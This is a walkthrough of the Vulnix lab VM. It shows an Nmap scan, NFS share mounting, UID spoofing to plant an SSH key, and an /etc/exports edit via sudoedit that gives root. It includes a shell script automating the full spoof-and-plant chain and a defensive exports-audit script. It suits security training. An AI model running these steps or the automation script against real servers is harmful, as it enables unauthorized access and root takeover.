Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well, at the time of release anyway!).
The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. To grab a copy, download it here: HackLAB: Vulnix
We always kick off with an Nmap scan:
nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Thu Jul 15 10:56:44 2021 as: nmap -sC -sV -oA nmap 172.16.139.216
Nmap scan report for 172.16.139.216
Host is up (0.0015s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL UIDL PIPELINING STLS CAPA RESP-CODES TOP
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 37916/udp6 mountd
| 100005 1,2,3 38356/tcp mountd
| 100005 1,2,3 41805/tcp6 mountd
| 100005 1,2,3 57305/udp mountd
| 100021 1,3,4 37121/udp nlockmgr
| 100021 1,3,4 40483/udp6 nlockmgr
| 100021 1,3,4 44054/tcp6 nlockmgr
| 100021 1,3,4 60768/tcp nlockmgr
| 100024 1 39121/udp6 status
| 100024 1 39196/tcp6 status
| 100024 1 48005/udp status
| 100024 1 48763/tcp status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: more have LOGINDISABLEDA0001 post-login LITERAL+ capabilities STARTTLS LOGIN-REFERRALS listed ID IDLE IMAP4rev1 Pre-login OK ENABLE SASL-IR
|_ssl-date: 2021-07-15T12:57:05+00:00; +3h00m01s from scanner time.
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time.
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2021-07-15T12:57:04+00:00; +3h00m00s from scanner time.
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 3h00m00s, deviation: 0s, median: 3h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 15 10:57:04 2021 -- 1 IP address (1 host up) scanned in 20.52 seconds
That is a lot of open ports, and probably the reason the box is rated hard. Enough talking, let's start enumerating. Twelve TCP ports are open on the target; the one that immediately catches the eye is 2049, the NFS port.
NFS port 2049
NFS (Network File System) is a client/server system that lets users access files across a network as if they lived in a local directory. The rpcinfo output on port 111 shows nfs (100003), mountd (100005) and nlockmgr (100021) all registered, so the server is fully up. Exploiting it should be easy.
NFS SHARE ON PORT 2049 EXPLOIT
showmount -e 172.16.139.216
The export list shows one share, /home/vulnix, exported to * (any client can mount it).
Create a mount point under /tmp:
mkdir /tmp/vulnix
Mount the share onto it (NFSv3 over TCP; nolock skips the lock manager, which we don't need for this):
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/home/vulnix /tmp/vulnix
Note: you can only mount as root. mount itself is privileged, and the NFS server's default secure option only accepts requests from source ports below 1024, which also need root to bind.
df -k
The share is mounted, but trying to list it gives Permission denied, even as root. That is root_squash at work: the server rewrites our UID 0 to the anonymous user, while any other UID we present it simply trusts. The directory is owned by a UID that has no name on our box (ls -ldn /tmp/vulnix shows it as a bare 2008), and we know the user on the target is vulnix,
so let's create a fake user on the attacking machine with that UID.
FAKE USER WITH THE SAME UID
We know the vulnix user's UID is 2008, so this should be easy:
useradd vulnix
usermod -u 2008 vulnix
su vulnix
Now we have access, but there is nothing in the home directory, not even an SSH private key. Still, as far as the server is concerned we are vulnix and the share is writable,
so let's create a .ssh folder and add our own public key to authorized_keys.
Back on the attacking machine, generate the key pair:
ssh-keygen -t rsa
Follow the prompts; the private key id_rsa and the public key id_rsa.pub land in ~/.ssh.
Now back to our target: as the vulnix user, create /tmp/vulnix/.ssh and append the contents of id_rsa.pub to /tmp/vulnix/.ssh/authorized_keys (do it as vulnix, not root, so the files are owned by the UID the server trusts).
Back on the attacking machine, use the private key to SSH in as vulnix:
chmod 600 id_rsa
ssh -i id_rsa vulnix@172.16.139.216
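The whole client-side chain above (read the export list, mount, match the share owner's UID and GID, plant a key) as one script. This is an added example, not part of the original walkthrough: the target address, share path and user name are taken from this page as defaults; the ECDSA key type, the key path under ~/.ssh and the idempotent user creation are my choices (explained in the comments); and it has to run as root on the attacking machine, for the same reason the mount did.

```shell
#!/bin/sh
# nfs_uid_spoof.sh - added example: the client side of the NFS UID-matching
# attack from this walkthrough, as one script. Assumptions: Linux attacker
# with GNU coreutils and nfs-common, run as root (mount and useradd need it,
# and the server's default "secure" option only accepts source ports < 1024).
# Defaults for target/share/user are the ones used on the page.

# Turn `showmount -e` output into "path clients" lines, dropping the
# "Export list for ..." header ("-" if the client column is missing).
parse_showmount() {
    awk 'NR > 1 && NF { print $1, ($2 == "" ? "-" : $2) }'
}

# Numeric owner and group of a path. With AUTH_SYS (the default, sec=sys) the
# server believes whatever UID/GID the client puts in each RPC; root_squash only
# rewrites UID 0, so becoming this UID locally is all the "authentication" needed.
owner_ids() {
    ls -ldn "$1" | awk '{ print $3, $4 }'
}

# Create (or renumber) a local account with exactly that UID/GID. The page does
# this with useradd followed by usermod; here it is one idempotent step.
ensure_spoof_user() {
    name=$1; uid=$2; gid=$3
    getent group "$gid" >/dev/null 2>&1 || groupadd -g "$gid" "$name"
    if id "$name" >/dev/null 2>&1; then
        usermod -u "$uid" -g "$gid" "$name"
    else
        useradd -u "$uid" -g "$gid" -M -s /bin/sh "$name"
    fi
}

# Generate a key pair (if missing) and append the public key to the share's
# authorized_keys. Everything touching the share runs as the spoofed user so the
# files arrive owned by the right UID. Key type is ECDSA on purpose: the target
# runs OpenSSH 5.9 (no ed25519 yet), and OpenSSH clients from 8.8 on refuse the
# SHA-1 ssh-rsa signature that a 5.9 server needs for RSA keys.
plant_key() {
    name=$1; mnt=$2; key=${3:-$HOME/.ssh/${name}_key}
    mkdir -p "$HOME/.ssh"
    [ -f "$key" ] || ssh-keygen -q -t ecdsa -b 256 -N '' -f "$key"
    pub=$(cat "$key.pub")
    su -s /bin/sh -c "umask 077; mkdir -p '$mnt/.ssh' && printf '%s\n' '$pub' >> '$mnt/.ssh/authorized_keys'" "$name"
}

# Full chain against one target. Usage: nfs_uid_spoof.sh <target> [share] [user]
main() {
    target=$1; share=${2:-/home/vulnix}; user=${3:-vulnix}; mnt=/tmp/$user
    echo "exports on $target:"; showmount -e "$target" | parse_showmount
    mkdir -p "$mnt"
    mount -t nfs -o vers=3,proto=tcp,nolock "$target:$share" "$mnt"
    set -- $(owner_ids "$mnt")          # $1 = uid, $2 = gid of the share owner
    echo "share owner is $1:$2, creating local user $user with that UID/GID"
    ensure_spoof_user "$user" "$1" "$2"
    plant_key "$user" "$mnt"
    echo "now run: ssh -i $HOME/.ssh/${user}_key $user@$target"
}

# With no arguments the script only defines the functions (so it can be sourced).
if [ $# -gt 0 ]; then main "$@"; fi
```

Run it as `sh nfs_uid_spoof.sh 172.16.139.216`; the last line it prints is the ssh command to use. parse_showmount and owner_ids are pure helpers, so they can be checked without a target, which is also the quickest way to see that the server never asked the client to prove anything beyond a number.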
We are in. First thing to check is sudo -l.
It seems we can use sudoedit to modify /etc/exports:
sudoedit /etc/exports
Interesting: /etc/exports is the NFS server's configuration, and being able to rewrite it means we choose what gets exported and with which options. Exporting /root with no_root_squash means root on our attacking machine is root on the share, so we can drop our key into /root/.ssh/authorized_keys and SSH in as root. Let's give it a try.
Change the line /home/vulnix *(rw,root_squash) to /root *(rw,no_root_squash), save, and confirm with showmount -e that /root is now exported. One caveat: the NFS server only re-reads /etc/exports on exportfs -ra or a service restart, both of which need root, so if the new export does not show up, reboot the VM and check again.
Boom. Now mount the NFS share (create /tmp/root first):
mount -v -t nfs -o vers=3,proto=tcp,nolock 172.16.139.216:/root /tmp/root
Mounted. Now change directory to /tmp/root.
The root flag is right there, but I want a root shell over SSH, so add our public key to /root/.ssh/authorized_keys again, this time as root on the attacking machine: with no_root_squash our UID 0 is no longer squashed, so the files land owned by root on the target.
Now SSH in as root with the same private key.
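Why the one-line edit to /etc/exports was enough, and what a safe version of that file looks like, as a small audit script over the real exports syntax. This is an added example, not from the walkthrough: the two weak lines are the export the box ships with and the one written in with sudoedit; the hardened line, and the client address 172.16.139.10 in it, are assumptions for illustration.

```shell
#!/bin/sh
# audit_exports.sh - added example: flag the /etc/exports options that made
# the sudoedit pivot on this box possible. Input is real exports syntax:
#   <path> <client>(<opt>,<opt>,...) [<client>(<opts>) ...]
# Prints one "path client: finding" line per problem; exit status 1 if any.
audit_exports() {
    awk '
    function flag(p, c, msg) { printf "%s %s: %s\n", p, c, msg; found = 1 }
    /^[ \t]*#/ || NF == 0 { next }                # comments and blank lines
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            if (split($i, parts, "(") > 1) {       # client(opts) -> client, opts
                client = parts[1]; opts = parts[2]; sub(/\)$/, "", opts)
            }
            opts = "," opts ","                    # so /,name,/ matches whole options only
            if (client == "*" || client ~ /^\*\./)
                flag(path, client, "exported to every host")
            if (opts ~ /,no_root_squash,/)
                flag(path, client, "no_root_squash: a client root is root on the share")
            if (opts ~ /,insecure,/)
                flag(path, client, "insecure: unprivileged source ports accepted")
            if (opts ~ /,rw,/ && opts !~ /,sec=krb5/ && opts !~ /,all_squash,/)
                flag(path, client, "rw over AUTH_SYS: server trusts client-supplied UIDs")
            if (opts ~ /,rw,/ && (path == "/" || path == "/root" || path ~ /^\/root\//))
                flag(path, client, "writable export of a root-owned system path")
        }
    }
    END { exit found ? 1 : 0 }'
}

# Constructed sample: the export as shipped on the box, then the line the
# walkthrough writes in with sudoedit.
weak_exports='/home/vulnix *(rw,root_squash)
/root *(rw,no_root_squash)'

# Hardened form (client 172.16.139.10 is an assumed lab address): one named
# client, sync writes, root_squash kept, and Kerberos (sec=krb5p) so the server
# authenticates users instead of believing the UID in each RPC. Without
# Kerberos the client list is the only thing standing between any client root
# and every non-root UID on the share, so keep it to hosts whose root you trust.
hardened_exports='/home/vulnix 172.16.139.10(rw,sync,root_squash,sec=krb5p)'

case "${1:-}" in
    "") ;;                                         # no args: just define the functions
    demo) printf '%s\n' "$weak_exports" | audit_exports || true
          printf '%s\n' "$hardened_exports" | audit_exports && echo "hardened: no findings" ;;
    *) audit_exports < "$1" ;;                     # audit a real file, e.g. /etc/exports
esac
```

`sh audit_exports.sh demo` prints the findings for the two weak lines (the shipped line already has two: world-exported and writable over AUTH_SYS, which is exactly the UID-matching hole used earlier; the sudoedit line adds no_root_squash and a writable /root) and nothing for the hardened line. On a real server, `sh audit_exports.sh /etc/exports` gives a non-zero exit status when anything is flagged.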
We are done and dusted.
Greetings from Muzec